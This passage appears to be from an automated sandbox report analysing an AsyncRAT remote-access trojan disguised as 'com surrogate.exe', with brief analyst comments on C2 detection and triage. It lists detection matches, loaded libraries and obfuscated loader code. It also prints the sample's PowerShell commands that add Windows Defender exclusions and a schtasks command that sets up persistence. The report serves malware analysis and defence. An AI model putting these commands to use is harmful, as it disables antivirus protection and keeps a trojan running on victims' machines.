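The config-independent heuristic flags all eleven C2 connections on its own, which matters because the next build of this client will ship a different address but the same "connect to a raw IP on a high port with no lookup" shape; the resolved ip-api.com connection on port 80 is left alone.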

Operating System Destruction

Source: C:\Users\user\Desktop\com surrogate.exe | Process information set: 01 00 00 00
(This is the BreakOnTermination flag from the signature list, set to 1. Once it is set, terminating the process causes a kernel bugcheck, so during live triage suspend svchostt.exe or clear the flag first rather than killing it outright.)

                      System Summary

                      barindex
                      Source: com surrogate.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\svchostt.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E2361
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E16E9
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E7242
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E6096
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E98B9
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E9962
Source: C:\Users\user\Desktop\com surrogate.exe | Code function: 0_2_00007FFD9B7E20C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFD9B8D30E9
Source: C:\Users\user\svchostt.exe | Code function: 15_2_00007FFD9B7F16E9
Source: C:\Users\user\svchostt.exe | Code function: 15_2_00007FFD9B7F0E5E
Source: C:\Users\user\svchostt.exe | Code function: 15_2_00007FFD9B7F20C5
Source: C:\Users\user\svchostt.exe | Code function: 17_2_00007FFD9B7D16E9
Source: C:\Users\user\svchostt.exe | Code function: 17_2_00007FFD9B7D0E5E
Source: C:\Users\user\svchostt.exe | Code function: 17_2_00007FFD9B7D20C5
Source: C:\Users\user\svchostt.exe | Code function: 18_2_00007FFD9B7D16E9
Source: C:\Users\user\svchostt.exe | Code function: 18_2_00007FFD9B7D0E5E
Source: C:\Users\user\svchostt.exe | Code function: 18_2_00007FFD9B7D20C5
Source: C:\Users\user\svchostt.exe | Code function: 19_2_00007FFD9B7D16E9
Source: C:\Users\user\svchostt.exe | Code function: 19_2_00007FFD9B7D0E5E
Source: C:\Users\user\svchostt.exe | Code function: 19_2_00007FFD9B7D20C5
Source: com surrogate.exe, 00000000.00000000.1648154375.00000000009C2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
Source: com surrogate.exe, 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
Source: com surrogate.exe | Binary or memory string: OriginalFilenameXClient.exel% vs com surrogate.exe
Source: com surrogate.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: com surrogate.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.com surrogate.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.com surrogate.exe.2d2f730.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\svchostt.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT, author = ditekSHen, description = Detects AsyncRAT
Source: com surrogate.exe, TmY9KD9bMG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: com surrogate.exe, VffR91FvSC.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchostt.exe.0.dr, TmY9KD9bMG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchostt.exe.0.dr, VffR91FvSC.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, TmY9KD9bMG.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, VffR91FvSC.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: com surrogate.exe, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: com surrogate.exe, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchostt.exe.0.dr, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchostt.exe.0.dr, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, SSDW2h8Bu2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@20/21@1/3
Source: C:\Users\user\Desktop\com surrogate.exe | File created: C:\Users\user\svchostt.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Users\user\svchostt.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
Source: C:\Users\user\Desktop\com surrogate.exe | Mutant created: \Sessions\1\BaseNamedObjects\FmQtb653HyFy3zc0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
Source: C:\Users\user\Desktop\com surrogate.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: com surrogate.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: com surrogate.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\com surrogate.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\com surrogate.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: com surrogate.exe | Virustotal: Detection: 69%
Source: com surrogate.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\com surrogate.exe | File read: C:\Users\user\Desktop\com surrogate.exe
Source: unknown | Process created: C:\Users\user\Desktop\com surrogate.exe "C:\Users\user\Desktop\com surrogate.exe"
Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\com surrogate.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\svchostt.exe C:\Users\user\svchostt.exe
Source: unknown | Process created: C:\Users\user\svchostt.exe "C:\Users\user\svchostt.exe"
Source: unknown | Process created: C:\Users\user\svchostt.exe "C:\Users\user\svchostt.exe"
Source: unknown | Process created: C:\Users\user\svchostt.exe C:\Users\user\svchostt.exe
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\com surrogate.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: version.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\svchostt.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\com surrogate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: svchostt.lnk.0.drLNK file: ..\..\..\..\..\..\..\svchostt.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: com surrogate.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: com surrogate.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_0Xk4LAS8az.MsJoi7Bf8l,_0Xk4LAS8az._8rXrHd7miw,_0Xk4LAS8az.pOSYswDeQd,_0Xk4LAS8az.WNrZBMvdl7,TmY9KD9bMG._5sNCQ0x6ef()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{OepsFAtL9A[2],TmY9KD9bMG.LJCimgw501(Convert.FromBase64String(OepsFAtL9A[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { OepsFAtL9A[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: com surrogate.exe, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: svchostt.exe.0.dr, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: _7BsNBZ4IQi System.AppDomain.Load(byte[])
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb System.AppDomain.Load(byte[])
                      Source: 0.2.com surrogate.exe.2d2f730.0.raw.unpack, HmgYWU24nC.cs .Net Code: P8ZoDU9PCb
                      Source: C:\Users\user\Desktop\com surrogate.exe Code function: 0_2_00007FFD9B7E00AD pushad ; iretd 0_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B6AD2A5 pushad ; iretd 1_2_00007FFD9B6AD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B6AE380 push ecx; iretd 1_2_00007FFD9B6AE41C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7C00AD pushad ; iretd 1_2_00007FFD9B7C00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B892316 push 8B485F95h; iretd 1_2_00007FFD9B89231B
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B891AC8 push es; ret 1_2_00007FFD9B891AC9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B6CD2A5 pushad ; iretd 5_2_00007FFD9B6CD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B7E00AD pushad ; iretd 5_2_00007FFD9B7E00C1
